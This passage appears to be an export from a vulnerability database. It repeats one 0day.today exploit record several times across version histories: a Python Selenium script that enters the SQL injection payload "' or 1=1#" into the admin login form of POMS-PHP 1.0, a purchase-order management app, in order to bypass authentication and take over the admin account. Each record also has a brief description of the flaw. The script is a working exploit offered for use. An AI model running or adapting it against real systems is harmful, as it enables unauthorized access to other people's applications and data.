SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-08] #"}, "lastseen": "2021-10-08T00:41:31", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "37fd4a94383e78453203a548cd72f5dd", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-08T23:13:40", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-09] #"}, "lastseen": "2021-10-08T23:13:40", "differentElements": ["sourceData"], "edition": 28}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "5e5c3ca506636bcfc8c04f2dfc354b3d", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-09T22:41:26", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-04T06:42:05", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-04T06:42:05", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-10] #"}, "lastseen": "2021-10-09T22:41:26", "differentElements": ["sourceData"], "edition": 29}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "398b0c794d61980f3f5a1b530eb01ad8", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-10T21:09:22", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-10T21:09:22", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-10T21:09:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-11] #"}, "lastseen": "2021-10-10T21:09:22", "differentElements": ["sourceData"], "edition": 30}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "e44acfb0d7694ed19a732db0a346a7e6", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-12T10:56:50", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-10T21:09:22", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-10T21:09:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-12] #"}, "lastseen": "2021-10-12T10:56:50", "differentElements": ["sourceData"], "edition": 31}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "c9ecd14e174c0a50687f95b92b16af29", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-12T23:06:14", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-12T23:06:14", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-12T23:06:14", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-13] #"}, "lastseen": "2021-10-12T23:06:14", "differentElements": ["sourceData"], "edition": 32}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "da8e4e22391b858b28a27ed6d5096f77", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-14T08:44:06", "history": [], "viewCount": 40, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T08:44:06", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-14T08:44:06", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-14] #"}, "lastseen": "2021-10-14T08:44:06", "differentElements": ["sourceData"], "edition": 33}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "220736f50e000b32dde4950347851585", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-14T22:50:29", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-14T22:50:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn btn-primary\r\nbtn-block\\\"]').click()\")\r\n\r\nprint(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin\r\naccount is PWNED by SQL - Injection\\n')\r\nprint(Fore.GREEN + 'Please see the screenshot poc.png to see if your\r\nexploit is working =) BR @nu11secur1ty\\n')\r\nprint(Style.RESET_ALL)\r\n\r\ntime.sleep(3)\r\nS = lambda X: driver.execute_script('return\r\ndocument.body.parentNode.scroll'+X)\r\n\r\ndriver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual\r\nadjustment\r\ndriver.find_element_by_tag_name('body').screenshot('poc.png')\r\n\r\ndriver.quit()\r\n\r\nexcept Exception:\r\n#### This exception occurs if the element are not found in the webpage.\r\nprint(\"Some error occured :(\")\r\n\r\n\r\n------------------------------------------------------------------\r\n\r\n### Description:\r\nThe POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication for the admin account in app\r\n/purchase_order/classes/Login.php.\r\nremote SQL-Injection-Bypass-Authentication:\r\nhttps://portswigger.net/support/using-sql-injection-to-bypass-authentication.\r\n\r\nThe parameter (username) from the login form is not protected correctly and\r\nthere is no security and escaping from malicious payloads.\r\nWhen the user will sending a malicious query or malicious payload to the\r\nMySQL server, he can bypass the login credentials and take control of the\r\nadmin account.\n\n# 0day.today [2021-10-15] #"}, "lastseen": "2021-10-14T22:50:29", "differentElements": ["sourceData"], "edition": 34}, {"bulletin": {"id": "1337DAY-ID-36729", "hash": "b272891af07e4c6bb0188894437af4fd", "type": "zdt", "bulletinFamily": "exploit", "title": "POMS-PHP 1.0 SQL Injection Exploit", "description": "", "published": "2021-09-10T00:00:00", "modified": "2021-09-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/36729", "reporter": "zdt", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2021-10-15T22:41:43", "history": [], "viewCount": 41, "enchantments": {"dependencies": {"references": [], "modified": "2021-10-14T22:50:29", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2021-10-14T22:50:29", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/36729", "sourceData": "### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote\r\nSQL-Injection-Bypass-Authentication.\r\n### Author: nu11secur1ty\r\n### Testing and Debugging: nu11secur1ty\r\n### Vendor: https://www.sourcecodester.com/user/257130/activity\r\n### Link:\r\nhttps://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form\r\n### CVE: CVE-nu11-09\r\n\r\n[+] Exploit Source:\r\n\r\n#!/usr/bin/python\r\n# Author @nu11secur1ty\r\nimport time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom colorama import init, Fore, Back, Style\r\ninit(convert=True)\r\n\r\n\r\noptions = webdriver.ChromeOptions()\r\noptions.headless = True\r\ndriver = webdriver.Chrome(options=options)\r\n\r\nPoC = 'http://localhost/purchase_order/admin/login.php'\r\n\r\ndriver.get(PoC)\r\n\r\n#enter your login username\r\nusername=\"nu11secur1ty' or 1=1#\"\r\n\r\n#enter your login password\r\npassword=\"nu11secur1ty' or 1=1#\"\r\n\r\n# test the exploit username\r\n#username=\"test\"\r\n\r\n# test the exploit password\r\n#password=\"blavsdfdfaaa\"\r\n\r\n#enter the element for username input field\r\nelement_for_username=\"username\"\r\n#enter the element for password input field\r\nelement_for_password=\"password\"\r\n\r\ntry:\r\n### 0\r\nusername_element = driver.find_element_by_name(element_for_username)\r\nusername_element.send_keys(username)\r\npassword_element = driver.find_element_by_name(element_for_password)\r\npassword_element.send_keys(password)\r\n\r\ntime.sleep(1)\r\ndriver.execute_script(\"document.querySelector('[class=\\\"btn 